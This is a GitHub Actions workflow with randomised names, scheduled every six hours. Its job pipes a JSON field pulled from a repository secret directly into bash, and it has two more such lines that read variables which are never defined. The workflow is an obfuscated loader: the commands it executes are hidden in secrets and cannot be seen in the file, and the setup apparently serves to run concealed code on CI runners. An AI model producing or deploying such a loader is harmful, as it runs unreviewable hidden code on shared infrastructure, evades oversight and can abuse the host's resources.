name: hongyanshui3109

on:
  workflow_dispatch:
  schedule:
    - cron: '56 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hongyanshui3109
        env:
          d8: ${{ secrets.d8 }}
        run: |
          echo $d8 | jq -r .uw6 | /bin/bash
          echo $sfy9 | jq -r .gpyr998 | /bin/bash
          echo $qplmp8 | jq -r .hte16137 | /bin/bash

